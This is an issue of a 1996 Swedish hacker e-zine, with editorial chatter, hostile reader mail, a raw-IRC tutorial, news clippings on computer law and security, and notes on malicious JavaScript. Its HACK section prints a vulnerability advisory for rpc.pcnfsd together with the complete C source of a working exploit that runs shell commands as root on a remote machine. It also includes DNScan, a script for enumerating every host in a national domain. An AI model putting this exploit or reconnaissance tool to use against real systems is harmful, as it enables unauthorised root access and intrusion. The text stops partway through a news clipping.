#!/bin/more ____ / \ ____ __ ____ \ /______/_ /_ ___/ /_ \ / _ / \ / _/ \/ __ \_/ __ / / / Nummer #2 (hse/a) / \ \ \ /__/__/__/ Mars 1996 \__/_______/ desejerunte? No idle, no gain BRAINSTORM Words, words, words 1.0 MAIL Vi drar några lyckliga vinnare 2.0 från månadens postsäck IRC IRC utan skyddsnät: Raw-IRC Dead Socket 3.0 HACK Bug i pcnfsd låter dig exekvera Shellshock 4.0 kommandon som root Äntligen är den här, DNScan 1.0 Shellshock 4.1 WWW Kreativ Java-kodning htXs 5.0 NYTT 6.0 Etisk storstädning på internet 6.1 Epost som att skicka hemlighet med vykort 6.2 Osäkert låta konsult sköta Malmöpolisens datahantering 6.3 Sex och politik bannlyst 6.4 Slutet för de elektroniska klotterplanken 6.5 Netscapes kryptering bruten på nytt-med gammal metod 6.6 Storebror fumlar med lagböckerna 6.7 HD lät datakopierare behålla utrustning 6.8 Lucka i lagen skyddar piratkopior 6.9 SURF Är Mitnick en überhacker eller en htXs 7.0 luser, avgör själv MISC Riksspolisstyrelsen på Internet Broken Pipe 8.0 En sysadmins samvete CB 8.1 ----------------------------------------------------------------------- Ord går ut till besättningen på #hack.se för hjälp med distributionen ----------------------------------------------------------------------- (C)opyright? /* ------------------------------------------------------------- All information i !shit publiceras endast i studiesyfte och som underhållning. Artikelförfattarna i !shit är inga förebilder. De är inte ens mänskliga. De är hackers. Vissa saker de gör kan få en person skadad, relegerad, arresterad, möjligtvis utvisad. För att uttrycka det hela på ett annat sätt: Don't try this at home. ------------------------------------------------------------- */ ___ ___ __ __ __ _ __ ____ ___ ___ _ __ ___ | _)| )/ | | \ |( _|_ _) _ \ ) V | _____________________________ 1.0 |____)_)_\_|_|__|_\__|___)|__|\___/_)_\_v__| Sedan den förra och första filen vi så gärna kallar !shit träffade gatorna har jag börjat dra mig för att visa mig på irc. Jag kan förstå att våra texter fungerar som ett livselexir för vissa, men ingen kan vara så beroende av detta alster att det berättigar att fråga mig *varje* dag när nästa nummer kommer. Artiklar kommer in löpande, och nya nummer kommer att släppas så fort det finns tillräckligt med material för att rättfärdiga det. Alltså kommer varje release sporadiskt, och jag varken vill eller kan veta när det blir. Så, det tjänar inget till att *tjata*. Ok? Detta är inte ett angrepp på *alla* som frågat hur det går med #2, tvärt om är det givetvis trevligt att veta att det finns en efterfrågan på det vi gör. Bara det finns måtta. Hoppas vi lyckats leva upp till förväntningarna. Kanske inte som en blixt från klar himmel har det uppstått en hel del ideer om hur !shit skall uttalas. Om dessa ideer faktiskt är missförstånd låter jag vara osagt eftersom det tvivellöst inte finns en absolut sanning i denna vetenskap. Men som en spark i rätt riktning för den skara som inte alls kan ta till sig betydelsen av utropstecknet i namnet, vill jag citera manfilen för bourne-shell: "! Unary negation operator". Nog om detta. Låt artiklarna och synpunkterna fortsätta flöda till: noshit@alpha.c2.org __ __ __ __ _ ___ | V |/ | | |_ _______________________________________________________ 2.0 |__v__|_|_|__|___| från /usr/lib/snedmail Tyvärr kan vi av utrymmesskäl inte ta med alla brev som vi fått, men vi uppskattar dem inte mindre för det. Forsätt skriva! Här kommer några smakprov som ganska bra representerar majoriteten av vår brevskörd. Date: Thu, 04 Jan 96 19:14:00 +0200 From: Phoo Subject: tack... snällt.. Tack så mkt för att du gjort mig känd i ditt "fina" zine !SHIT... mkt trevligt.. nu kommer jag förmodligen bli tvungen att byta nick.. fan ta dig.. :( annars så dög !shit nästan... kommer det fler nummer eller? vart kommer man få tag i skiten? lägg upp det på nån ftp... || -Phoo- of AiP \__/ * SLMR 2.1a * ------------------------- Date: Fri, 05 Jan 96 16:19:00 +0200 From: SPiFf Subject: Lama.. Hohoooo... Jag läste just "din" tidning !shit, vilket faktiskt sammanfattar den rätt bra... Shit.. Fukk, den suger kuk.. Kan du inte göra en bättre tidning så gör ingen alls.. Du verkar tro att man är ELiTe för att man använder lite freakiga versaler/gemener.. Jag är fan säker på att du inte ens är nån pirater ö.h.t. Du är bara en liten Lama som sitter och skriver mesiga små E-ZiNes... Elite Commandments: ------------------- 1] Never admit you have no idea what you're talking about. (Den tar du bokstavligt) 2] Never have a good word to say about anyone else but yourself. (Wow.. Den följer du också) 3] Join every group that will let you join. After a few weeks have passed, quit & claim they aren't good enough to merit your prescence. (Hee.. Pook..) 4] Always shift the blame to someone else. "It's not my fault" should become 2nd nature to you. (Humm....) 5] Always have nasty things to say about your so called friends behind their backs. 6] Hate as many people as possible. (Du har vänt på den, "få så många som möjligt att hata dig") 7] Start as many rag wars as humanly possible. When your up against intelligent people (As on Adventurers Tavern, 1982-1986. RIP), and losing your end of the war. Say "This is stupid and childish, even if I did start it", and stop posting. 8] When someone becomes pushy and openly challenges your lack of knowledge about something. Say "I know the answer, but you're not elite enough, so I can't tell you". (Haha.. rätt i prick) 9] If anyone still dares to question you then threaten them with tough things like getting someone to turn their phones off, or charge 10 billion toilets on their mothers credit card. (It doesn't matter whether or not you actually know how to do this, or know anyone else who will do it for you. This is a favorite tactic of ELITE!@ phreak groups like L0D!!@#1!.) If all else fails began chanting "Cable throw, Cable throw, Cable throw" or if you are a pirate: make a fright- ening rag page on them in your next Copya crack. [Warning: Be sure to only use this on a fellow ELITE!@#1! phreak, pirate or equivalent ignorant person. Anyone else will laugh at you & tell you to fuck off. Only adding to the questioning of your massive eliteness.] 10] Make as big a fool of yourself as is possible. Display your ignorance and stupidity in a manner that will make itself noticible to the modem community at large. If you are a aspiring elite pirate, get your name on as many copya cracks as fast as possible. Or if you are a up and coming elite phreak, start up your own little world (or join someone else who has already done this, such as LOD), refuse to see anyones viewpoint but your own, & declare yourselves mega-elite. Följer du bara dom här reglerna eller? Fukk.. Och sen, när du börjar ta pHOo som exempel på en lama, så är du ganska långt ute i skogen. Har du inte hört talas om pHOo så vet jag fan inte var du har varit de närmaste månaderna.. Under en sten? =) En sak till; på din lilla SuRf lista (Vem fan använder ordet surfa ändå? Låter som aftonbladet "Så här surfar du på nätet..") Duh.. Iaf, inte en enda FTP fanns med, alla kanske inte gillar att sitta och se en massa fina bilder och menyer som på WWW, jag förstår att W95-luserz som du kanske gillar det, men de flesta vill ha FTPs när man ska ladda hem prylar.. Ut och smurfa med dig... Jaja, fortsätt knapra på dina små floppiez och skriv din ZiNe, men tro inte att nån bryr sig... Iaf inte jag, the almighty SPiFf... =) Fuck ELiTe, go ShareWare... NOT NOT NOT NOT NOT NOT!!!!!! =) /EL SPiFf of AiP Rokxz da funkie Joint.... * SLMR 2.1a * __ ___ ___ ___ | | ) __) _____________________________________________________________ 3.0 |__|_)_\___) Raw-IRC, av Dead Socket Du har precis hackat ns.tip.net och känner att du behöver besöka #hack.se för att skryta med din erövring. Men det finns givetvis ingen irc-klient på ns.tip.net. Vad gör du nu? Min rekommendation är att du kollar i Gula Sidorna under P för psykolog. Inte i helvete är du väl så dum att du använder ns.tip.net för att irca? Kom igen! Allvarligt talat, så är protokollet mellan klient och server baserat på kommandon som skickas i klartext, och det hela är mycket enkelt och raktfram. Att hoppa över klienten och ansluta sig direkt till servern kallas ibland för raw-irc. Det är inte svårare än en telnet till din favoritserver på port 6667 och att följa dessa enkla instruktioner. beavis> telnet irc.nada.kth.se 6667 Trying 130.237.226.10... Connected to mumrik.nada.kth.se. Escape character is '^]'. Det första som händer när du kopplar upp dig mot port 6667 är att irc-servern förväntar sig viss information om dig. Börja med att skriva; NICK IvilHaxor ...eller vilken nick du nu vill använda. Därefter måste du ange ditt konto, host- och servername, samt ditt "riktiga" namn. Fälten för hostname och servername ignoreras, så där kan du skriva vad som helst. Syntaxen är: USER ivilhax hostname servername :Da iViL 0nE Om nicken inte är upptagen så kommer du att se ditt välkomstmeddelande som indikerar att du är inne. Nu kan du använda alla dina vanliga kommandon typ JOIN, PART, MODE, osv. JOIN #hack.se :ivil!~ivil@enemy.public.se JOIN :#hack.se :irc.nada.kth.se 353 ivil @ #hack.se :ivil @shshock @TheK @blur @Chaoz tcm @E-114 chaotic @acdhead @thk psyched :irc.nada.kth.se 366 ivil #hack.se :End of /NAMES list. Det som är annorlunda är hur du skriver till en channel eller skickar msg's. Båda delarna gör du med PRIVMSG enligt följande: PRIVMSG #hack.se :w0rdawp, wassup? PRIVMSG shshock :n4r k0mm3r !shit #2, d00d? Om du är inaktiv kommer du att få upp ett PING-meddelande. Typ: PING :irc.nada.kth.se Det måste du svara på, annars kommer du att bli nedkopplad. Skriv: PONG :irc.nada.kth.se Svårare än så är det inte. Om du vill ha mer information om irc-protokollet så finns det beskrivet i RFC1459. _ __ __ ___ _ __ ___ | L |/ | _| / / _______________________________________________________ 4.0 |_||_|_|_|___|_|_\ Avalon Security Research Release 1996.1 (pcnfsd) Affected Program: rpc.pcnfsd Tested Operating Systems: SunOS 4.1.X, Linux Affect: Remote attackers may execute an arbitrary command as root on the target machine. Bug Synopsis: rpc.pcnfsd's run_ps630 function does not correctly validate it's arguments. This allows us to trick rpc.pcnfsd into running a command other than ps630. Fix: The the run_ps630 function does not seem to be needed. Removing the only call to it in pr_start (pcnfsd_print.c) should remove this vulnerability. Exploit Information: Exploit code will be posted to the ASR mailing list exactly one week from the release of this advisory. Notes: Although the rpc.pcnfsd bundled in all Linux distributions is vulnerable. Is appears to be exceedingly difficult to exploit this vulnerability under Linux. ASR welcomes and appreciates information on the action of this vulnerability in other operating systems. Sedan denna advisory släpptes har det gjorts fler tester, och buggen verkar inte vara möjlig att utnyttja under Linux. Dock har vi kunnat bekräfta att SunOS 4.x, Irix och BSDI är sårbara. Ta hem sourcen till pcnfsd från bcm.tmc.edu:/pcnfs/pcnfsd.93.02.16.tar.Z och kompilera nedanstående program för att testa om din pcnfsd är sårbar. Om du har möjlighet att göra tester under något annat OS än ovan nämnda så är vi mycket intresserade av resultatet. Skicka info till shshock@alpha.c2.org. -----------------8<-- klipp här ----------------------------------------------- /* slugger2.c * By Josh D. November 1st 1995 AD * rewritten January 31st 1996 AD * compile w/ pcnfsd_clnt + pcnfsd_xdr + rpcsvc * usage: slug2 target 'command' * where: * slug2 is this program. * target is the target host * 'command' is a bourne shell command within single quotes *and* * with the slash chr ('/') substituted with the A environment * variable: e.g. 'touch ${A}filename' would equate to * 'touch /filename'. * caveat: * The command is limited to 27 charactars. * Using shell meta-charactars (!#$^&*()<>[] etc etc) in your command * will cause the exploit to fail. * If rpc.pcnfsd was started from the rc scripts (as opposed to inetd) * which it usually is: it will die after one succesful run of this * program. * The rpc calls this code makes always fail and print the error code: * '137' <<---- See 'wierd ass error' below. * This code always times out ont it's pr_start call because rpc.pcnfsd * dies before it gets a chance to reply. This fix for this is * to make to timeout value very small for the pr_start call. * * ********************************************************************** * * This code is provided for educational purposes only. * Neither Josh D. nor ASR take any responsibility for the use * or misuse of this code. * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcnfsd.h" /* this should be created by rpcgen */ int main(argc, argv) int argc; char **argv; { char myhost[200]; int gids[8]; struct hostent *dahent; struct sockaddr_in daserver; CLIENT *datsme; struct pr_init_args daargs; struct pr_init_res *dares; struct pr_start_args fags; struct pr_start_res *figs; char daprinter[65]; char dadir[65]; char dapath[255]; struct timeval tout; int ranysock=RPC_ANYSOCK; tout.tv_sec=60; tout.tv_usec=0; if (argv[3] != NULL && argv[4] != NULL) { printf("bad arguments\n"); exit(1); } if (strlen(argv[2]) > 27) { printf("command must be less than 27 chars\n"); exit(1); } /* this must be a valid printer */ strcpy(daprinter, "lp"); daserver.sin_family = AF_INET; daserver.sin_port = 0; dahent = gethostbyname(argv[1]); if (dahent == NULL) { printf("gethost failed.\n"); exit(1); } bcopy(dahent->h_addr, &daserver.sin_addr.s_addr, 4); datsme = clntudp_create(&daserver, 150001, 1, tout, &ranysock); clnt_control(datsme, CLSET_TIMEOUT, &tout); gids[0]=0; gids[1]=1; datsme->cl_auth = authunix_create(myhost, 0, 0, 2, gids); sprintf(dapath, "..${A:=$HOME}..$A..${A}bin${A}sh -c \"%s\" ", argv[2]); daargs.pia_client = dapath; daargs.pia_printername = daprinter; /* Wierd ass error: whenever we pub '"' in a string for pr_init/pr_start rpcsvc seems to break. This doesn't imapir the effects of the exploit, it simply doesn't allow us to see any errors pcnfsd returns. I don't plan on fixing this. */ /* simple minds.... */ if ( (dares = pcnfsd_pr_init_1(&daargs, datsme)) == NULL) { printf("137\n"); } else { if (dares->pir_stat == PI_RES_OK) printf("Success\n"); if (dares->pir_stat != PI_RES_OK) { printf("Error: "); switch(dares->pir_stat) { case PI_RES_NO_SUCH_PRINTER : printf("No such printer\n"); break; case PI_RES_OK : printf("Result Ok\?\?\n"); break; case PI_RES_FAIL : printf("Generic Failure\n"); break; default : printf("Unknown Error\n"); } } } fags.psa_client = "."; fags.psa_printername = daprinter; fags.psa_username = "root"; fags.psa_filename = dapath; fags.psa_options = (argv[3] == NULL) ? "d ;> " : "d ;< "; /* simple pleasures */ figs = pcnfsd_pr_start_1(&fags, datsme); if (figs == NULL) { printf("137\n"); exit(1); } } -----------------8<-- klipp här ----------------------------------------------- 4.1 Universalverktyget för domänfrågor DNScan För ett tag sedan så ville jag lista alla burkar med DNS-entries för ett helt land, och insåg att det inte lät sig göras enkelt. Så jag hackade ihop en liten utility för det, och gav den till några kompisar på #hack.se och bad att de inte skulle sprida den vidare tills det att jag hade en färdig och bugtestad version klar. Mindre än en vecka senare började jag få mail från ställen så långt bort som Malaysia som tackade för att jag skrivit ett sådant användbart verktyg. Hmm... Tyngd av ansvaret att folk faktiskt använder mitt lilla script har jag nu fixat de buggar som fanns och fått fram en version 1.0 som jag vågar stå för. Håll till godo. -----------------8<-- klipp här ----------------------------------------------- #!/bin/sh # # DNScan 1.0 by Shellshock (shshock@alpha.c2.org) # # Directory for temporary files TMPDIR=. # Name of lockfile for -file mode LOCKFILE=$TMPDIR/dnscan.lock # Set default parameters to nslookup, 2 retries with a timeout of 10 secs PARAMS="-retry=2 -timeout=10" # Print usage information usage() { more << end-of-text Usage: dnscan [-quiet] [-file ] [-domain ] [-sub ] -quiet Useful when piping to a file while running in the background. -file Use as a list of subdomains and servers to scan. -domain List all servers in a first level domain like .uk or .no. -subdomain List all servers in a subdomain. DNScan usually generates alot of output, so you probably want to pipe the output to a file. Some messages will still be sent to you terminal to keep you informed of whats going on, unless you use -quiet. The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. It will not work with the com, edu, mil, gov, net or org domains, because there is no single name server that will list these. If you want to create your own file to run in the -file mode, each line of the input file needs to have the following format: [] * To list all servers in Japan, do "dnscan -domain jp". * To list all servers in the netcom domain, do "dnscan -sub netcom.com". * To find Sun boxes at swipnet, do "dnscan -sub swip.net | grep -i sun". I've found that sometimes nslookup hangs on a query. Just find nslookup with ps and kill it, and the scan will continue with the next subdomain. end-of-text } ### Strip away all unwanted lines from the output of the 'ls -d', that is: ### - all server names ending with a dot, they are probably in another domain ### - all references to localhost (127.0.0.1) ### - all lines not of the type A or HINFO clean_serverlist() { sed -n " { /^.*\. /d /127.0.0.1$/d / A /s/^ /$SUBDOMAIN /p / HINFO /s/^ /$SUBDOMAIN /p } " | sort -u } ### List the name servers handling the selected subdomain list_subdomain_dns() { echo "$SUBDOMAIN" | nslookup -querytype=ns $PARAMS |\ sed -n 's/.*nameserver = //p' } ### Print a formated list of servers (recordtypes A and HINFO) in a subdomain ### If we don't already have selected a name server, take the first in the ### list from list_subdomain_dns, or even better use one that is actually ### within the subdomain list_subdomain() { if [ -z "$DNS" ]; then DNS=`list_subdomain_dns | grep -i $SUBDOMAIN\$ | sed -n 1p` [ $DNS ] || DNS=`list_subdomain_dns | sed -n 1p` [ $QUIET ] || echo "Using name server $DNS for *.$SUBDOMAIN" >&2 fi echo "ls -d $SUBDOMAIN" | nslookup $PARAMS - $DNS | clean_serverlist } ### Scan all subdomains listed in a file from_file() { while read domain subdomain DNS; do [ $domain ] || continue SUBDOMAIN=$subdomain.$domain # If POS is set, we are continuing an interrupted scan if [ $POS ]; then [ $SUBDOMAIN != $POS ] && continue unset POS fi [ $QUIET ] || echo "Scanning $SUBDOMAIN" >&2 # Write infile and subdomain to a lockfile, so that we # later can continue the scan if we get interrupted echo "$INFILE $SUBDOMAIN" > $LOCKFILE list_subdomain echo done < $INFILE } ### Strip away all but the NS lines from the output of the 'ls -d' and sort ### Also filter server names ending with a dot, and prepend the domain name ### first on each line clean_dnslist() { sed -n " { /^.*\. /d s/^ /$DOMAIN / s/ NS / /p } " | sort -u +1 -2 } ### List all the name servers handling the selected domain list_domain_dns() { ( echo root; echo "$DOMAIN." ) |\ nslookup $PARAMS -querytype=ns -domain=$DOMAIN |\ sed -n 's/.*nameserver = //p' } ### List all name servers in the selected domain list_domain() { DOMAINFILE=domain.$DOMAIN # Use first name server in the list for the domain domain_dns=`list_domain_dns | sed -n 1p` [ $QUIET ] || echo "Using name server $domain_dns for *.$DOMAIN" >&2 # Create a file with all subdomains and their name servers, and then # switch to -file mode echo "ls -d $DOMAIN" | nslookup $PARAMS - $domain_dns |\ clean_dnslist > $DOMAINFILE MODE=file INFILE=$DOMAINFILE from_file } ### Parse flags unset QUIET while [ -n "$1" ]; do case "$1" in -quiet) QUIET=true ;; -file) MODE=file INFILE=$2 shift ;; -domain) MODE=domain DOMAIN=`echo $2 | sed 's/^\.//'` shift ;; -sub) MODE=subdomain SUBDOMAIN=`echo $2 | sed 's/^\.//'` shift ;; *) usage exit ;; esac shift done ### Look for previously interrupted scan if [ -f $LOCKFILE ]; then echo "Continue previously interrupted scan [n]? \c" >&2 read r if [ `echo x$r | grep -i "^xy"` ]; then read INFILE POS < $LOCKFILE [ $POS ] && MODE=file fi [ $QUIET ] || echo >&2 fi ### Present ourself [ $QUIET ] || ( echo "DNScan 1.0 by Shellshock"; echo ) >&2 ### Select mode case $MODE in file) from_file ;; domain) list_domain ;; subdomain) list_subdomain ;; *) usage exit ;; esac ### Clean up the temporary file we have created rm $LOCKFILE 2>/dev/null __ __ __ __ ___ \ \/\/ /\/\/ /\/\/ / _____________________________________________________ 5.0 \_/\_/\_/\_/\_/\_/ Kreativ Java-kodning, av htXs Debatten om vad någon med ont uppsåt kan ställa till med, med hjälp av Java är i full gång. Redan finns det ett par ganska skrämmande (eller upplyftande, beroende på vem man är) förslag: Ta följande lilla script till exempel.
När du tror att du endast tittar på en helt oskyldig sida med en GIF-bild på, så skickas i själva verket ett mail till noshit@alpha.c2.org, i *ditt* namn, i ögonblicket som du öppnar sidan. http://www.popco.com/grabtest.html Eller vad sägs om ett script som gömmer sig i bakgrunden, och varje gång du går till en ny URL så rapporteras det tillbaka till servern där du "plockade upp" det elaka scriptet? http://www.osf.org/~loverso/javascript/track-me.html Det tredje och kanske värsta exemplet är ett script som listar ett bibliotek eller en fil på din hårddisk, och skickar iväg resultatet. Om du skulle starta Netscape som root innebär att din /etc/shadow helt plötsligt kan plockas från din dator, utan att du märker det! http://www.osf.org/~loverso/javascript/dir.html Brendan Eich från Netscape lovade (inofficiellt) följande 29/2 för att lösa ovanstående säkerhetsproblemen med Java: "We're fixing directory listing and mail spamming, plus adding a Preference to disable JavaScript, in a special 2.01 release that's about to supercede 2.0. Also in the Gold release, and (of course) in the "next release" (3.0b1, I believe)." Hmm... __ _ _ _ ____ __ ___ | \ | ) |_ _) ) _______________________________________________________ 6.0 |_\__|_ |__|__| Nyhetsklipp från januari och februari (___/ --------------------------------------------------------------------------- 6.1 Dagens Industri, 951230 Etisk storstädning på internet --------------------------------------------------------------------------- Det finns mycket skräp på det internationella datanätet internet. Lika illa är det med de speciella databaser som går under beteckningen BBS, elektroniska anslagstavlor. Information som snarast är desinformation presenteras som om de vore nyttiga nyheter. Men nu är det dags för etiska spelregler. Det ska bli slut på den elektroniska miljöföroreningen - de svenska IT-företagens branschorganisation Sito går till attack och uppmanar sina medlemmar att stoppa oetisk information. Jag tror att branschen kan sanera sig själv, säger Hans Iwan Bratt, VD för Sito i Stockholm. Med våra nya regler om ansvar för elektronisk information skapar vi något som närmast liknar de pressetiska reglerna. Det vore olyckligt med stelbent lagstiftning, en lagstiftning som ändå inte skulle ge effekt. Hotas med uteslutning Sitos medlemsföretag blir skyldiga att följa de stundande etiska affärsreglerna för elektronisk information. Den som bryter mot dem utesluts ur branschorganisationen. Hans Iwan Bratt anser att de stora problemen med skräpinformation handlar om dålig och föråldrad information. Det förekommer också obehagliga förföljelser mot privatpersoner och folkgrupper på såväl internet som på vissa BBS-adresser. Däremot tycker Hans Iwan Bratt att spridningen av barnpornografi fått allt för stor publicitet: Det är ett ytterst litet problem med få aktörer och få intresserade. Personförföljelser och sabotage av olika slag är betydligt allvarligare för internets rykte. Ett vanligt sabotage är så kallad bombning: en misshaglig person eller aktör på internet får så mycket elektronisk post att dennes elektroniska brevlåda kollapsar. Resultatet blir ofta att personen eller operatören får stänga sin anslutning till internet. I USA har t ex militanta kvinnogrupper bombat internetsidor som visar porr- och fotomodeller. Risk för peststämpel Enligt Hans Iwan Bratt löper internet stor risk att få samma peststämpel som 071-numren fick för några år sedan. Det hotar den kommande kommersiella utvecklingen av internet och därför reagerar branschen. Svag organisation Sito hette tidigare LKD och samlar 250 medlemsföretag med en total omsättning på 100 miljarder kronor - 90 procent av branschens totalomsättning. Ändå anses Sito vara en relativt svag branschorganisation; flertalet IT-företag är småföretag som inte är med men som ändå agerar på internet eller BBS. Det är dessutom i praktiken omöjligt att förbjuda information på internet utan att kapa förbindelserna med omvärlden. Förbjuds tex starkölsreklam på internet i Sverige så kan informations- lämnaren flytta till utlandet med några enkla handgrepp vid datorn. --------------------------------------------------------------------------- 6.2 TT, 960123 Epost som att skicka hemlighet med vykort --------------------------------------------------------------------------- Datasäkerheten på svenska företag och myndigheter är ofta skrämmande dålig. Sekretessbelagda uppgifter om privatpersoner, till exempel sjukjournaler, straffregister och annat går i klarskrift över internet. Hemlig företagsinformation sänds utan skydd. -Det är som att skicka hemligheter med vykort, säger dataexperten Tommy Pedersen. Han har jobbat med datasäkerhet i sex år och börjar bli ganska luttrad. Säkerhetsbristerna är ofta häpnadsväckande. På tisdagen pratade han säkerhet på ett seminarium vid en fackmässa för tele- kommunikationer på Svenska Mässan i Göteborg. Där, på Telecom Scandinavia, var det de tekniska nymodigheterna och alla spännande möjligheter de ger, som var huvudtemat. I Tommy Pedersens värld finns även den mörka sidan av utvecklingen, den som kan användas för industrispionage och som kan hota människors personliga integritet. För den som vill leta är det inga problem att till exempel sortera i epost-högarna på internet. Bara att ta fram Speciella program hjälper snokaren att leta och tar bara fram det han eller hon är intresserad av. -Det är fritt fram för den som vill spionera, säger Pedersen. Han arbetar för ett företag som heter Sectra AB i Linköping och som levererar krypteringsutrustning för datakommunikation till svenska försvaret. Där finns medvetenheten. På privata marknaden och bland myndigheterna är vakenheten sämre. -Datainspektionen borde få större resurser, framför allt när det gäller tekniker, säger Tommy Pedersen. Han har sett strikt privata, sekretessbelagda personuppgifter gå helt öppet på nätet. Företag, som lägger stora summor på elektroniska övervaknings- system, vaktutbildning och svårforcerade stängsel, skickar just den företagsinformation man vill skydda utan minsta sekretess. Som vykort, enligt Pedersen. -Hade de legat i kuvert så hade man åtminstone haft det lilla skyddet för hemligheterna. Bristerna finns på alla nivåer, även hos stora svenska multinationella företag. Sådana som borde veta bättre. Inte dyrt att skydda Tekniken för att kryptera och skydda informationen har funnits länge och är heller, enligt Pedersen, inte speciellt dyr. Problemet är snarare att få beslutsfattarna att förstå. -Säkerhetscheferna på företagen har ofta sin bakgrund i vad man kan kalla fysisk säkerhet. Kommunikationerna är teknikernas sak, säger Pedersen. I Sverige finns det en handfull företag som sysslar med säkerhetsfrågor. I utlandet, till exempel Italien och England, är branschen betydligt mer utbyggd. Antalet databrott har tvingat fram medvetenheten. --------------------------------------------------------------------------- 6.3 TT, 960124 Osäkert låta konsult sköta Malmöpolisens datahantering --------------------------------------------------------------------------- Rikspolisstyrelsen (RPS) har förbjudit länspolismästaren i Malmö, Hans Wranghult, att låta en utomstående konsult ta hand om myndighetens hela datahantering. -En kovändning och dessutom inkonsekvent eftersom RPS också använder konsulter, menar en besviken Wranghult. Det handlar inte om kostnaden. I stället hänvisar RPS till säkerhetsaspekten i beslutet att stoppa Malmöpolisens konsultplaner. Det som Malmöpolisen planerat kallas i datakretsar för "outsourcing". Det innebär att hela dataverksamheten, hanteringen av allt från spaningsuppgifter till bokföring, skulle läggas ut på ett konsultföretag. Att göra det är enligt RPS en mycket känslig fråga, och strax före årsskiftet förbjöd man uttryckligen Malmöpolisen att fullfölja planerna, berättar Sveriges Televisions Sydnytt. Hans Wranghult, som bland annat utrett databrott och är RPS databrottsexpert, förvånas över beslutet: -Jag har planerat detta sedan hösten 1994 och naturligtvis gjort säkerhetsbedömningar. -I över ett år har RPS dessutom haft full insyn och fått information om projektets fortskridande. Senast i september var en representant från RPS på besök här, säger Wranghult till TT. Under hela processen fram tills helt nyligen har länspolis- mästaren varit övertygad om att konsultprojektet därför varit förankrat och uppskattat hos RPS. Stategisk betydelse Det var RPS dataexpert Björn Lindqvist som besökte Malmö i höstas. Hans bild är något annorlunda än Wranghults. -Jag kan bara beklaga om Hans Wranghult fick intrycket att vi var positiva till outsourcing. I själva verket föranleddes mitt besök av att vi då helt nyligen insett omfattningen av Malmös planer. -Efter mitt Malmöbesök gjorde jag omedelbart en muntlig rapport till rikspolisstyrelsens direktion. -Wranghult borde ha insett att detta var en fråga av strategisk betydelse, ett beslut som ytterst måste hamna hos rikspolischefen. Lindqvist påpekar också att länspolisorganisationerna i Stockholm och Göteborg klarar av att i huvudsak själva hålla i sin datahantering. -Det kan förekomma vissa konsultinsatser. Men total outsourcing, som Malmö planerade, finns inte någonstans inom polisen, säger han. RPS uttryckliga förbud mot att använda ett utomstående företag för drift, underhåll, och fortbildning inom datahanteringen, tvingade Malmöpolisen att bryta samarbetet med det databolag som då redan arbetat med en totalinventering av myndighetens datahantering. 900 000 kronor är hittills nedplöjda i projektet. -Men det är inte pengar som kastats i sjön. Den största kostnaden ligger just på inventering och dokumentation, menar Wranghult. Efter kallduschen med RPS förbud har länspolismyndigheten i Malmö också hunnit gå vidare i arbetet med att bygga upp den egna kompetensen på området. Den gångna helgen annonserade man exempelvis efter en datachef. --------------------------------------------------------------------------- 6.4 Svenska Dagbladet, 960206 Sex och politik bannlyst --------------------------------------------------------------------------- Den allmänna ordningen måste upprätthållas. Det innebär att kineserna får klara sig utan politik och sex på Internet. Den kinesiska regeringen börjar bli orolig för att cyberrymden ska förvrida huvudena på alla nätsurfare. Ministeriet för Post och Tele ska se till att alla Internetanvändare registreras och att alla kontakter med internationella datanät går via ministeriet, enligt tidningen Financial Times. Allt för att komma ifrån "ohälsosamma tendenser" i samhället. Exempel på sådana tendenser är individer som sysslar med statshemligheter och pornografiskt material - så kallad barbarisk information. Icke önskvärt Hur ska då Kina få stopp på informationen som flödar på Internet. Jo, genom att skapa en "Internet Light" där användarna har obegränsad tillgång tillvarandras material men avskärmas från det som inte är "önskvärt" från omvärlden. Kina går med i det nya informationssamhället, men begränsar samtidigt tillgängligheten, skriver tidningen Wall Street Journal. Än så länge använder bara 50 000 människor Internet i Kina. För vetenskapsmän är nätet en guldgruva eftersom informationen är gratis. Explosiv brygd Den kinesiska regeringen fruktar främst politisk opposition och pornografi. Dissidenter som skickar information via nätet till sympatisörer i Kina ärinte populära. Regeringens "Internet Light" innebär att de kinesiska användarna kan skapaegna hemsidor, byta information med varandra, använda databaser och besökade hemsidor som accepteras av regimen. Övriga delar av Internet görs otillgängliga med hjälp av ett mjukvaru- program från det amerikanska företaget Sun Microsystems. Kineserna erkänner att en hacker kan ta sig igenom. Men det är både svårt och riskfyllt att bryta mot reglerna. Sex och politik är tydligen en explosiv brygd i Kina. --------------------------------------------------------------------------- 6.5 Datateknik, 960215 Slutet för de elektroniska klotterplanken --------------------------------------------------------------------------- Den 30 augusti 1995 hölls i Rosenbad en hearing kring ett lagutkast om BBSer (Bulletin Board Systems). Eller elektroniska anslagstavlor som de kallas på svenska. Bland de fyrtiotal inviterade fanns folk från myndigheter, organisationer, universitet och näringsliv, med stark kantring åt jurister. Också Telia, Postnet, Sunet, TT och olika regionala nätverkssatningar var på plats. Samt en liten grupp närmast sörjande. BBSare från det världsomspännande BBS-nätet Fidonet, men också från de partipolitiska anslagstavlorna för (s) och (m), plus några till. Värd var enmansutredaren i IT-utredningen, Hans Jacobsson, till vardags chef för bankstödsnämnden. Vad var det då som Jacobsson satte i händerna på gästerna? Jo, ett lagförslag som var rena dödsstöten för allt vad BBSer heter. Enligt förslaget ska systemägaren, eller en av honom utsedd systemoperatör, ha ansvaret för att BBSen inte innehåller något brottsligt. Användare måste loggas och registreras för att vid behov kunna spåras av polisen. Uppgifterna ska tillsammans med det vederbörande lagt in i basen sparas under ett års tid. Datainspektionen ska ha full frihet att när som helst kontrollera databasen och efter eget gottfinnande stänga den. Ägare och systemoperatör måste ha uppnått myndig ålder! Klart att det blev protester. De lagkloka upprördes lika mycket som nätadministratörer och databasproducenter. Men i synnerhet förstås BBSarna själva. -Det är helt ohållbart att lägga ansvaret på systemoperatören, menar BBSaren Jonny Bergdahl som var med på hearingen för ett halvår sedan. -Ingen kommer att våga ha det jobbet. Bara genom min dator passerar 1500 inlägg var dag. Man kan inte läsa allt! -Och Datainspektionen får i förslaget större makt än polisen som ju inte kan göra husrannsakan utan att ha allvarliga misstankar om brott! Men alldeles uselt var nog inte förslaget, försvarar sig IT- utredningens sekreterare Per Furberg. -Flera kom fram efteråt och tyckte det var bra. Varken Furberg eller Jacobsson gör dock någon hemlighet av att majoriteten var starkt negativ. Några exempel: Omöjligt att spara allt ett helt år; omöjligt att registrera och kolla upp alla som ringer in till databasen; orimligt att lägga svåra straffrättsliga bedömningar på systemoperatörerna. Kanske, menar 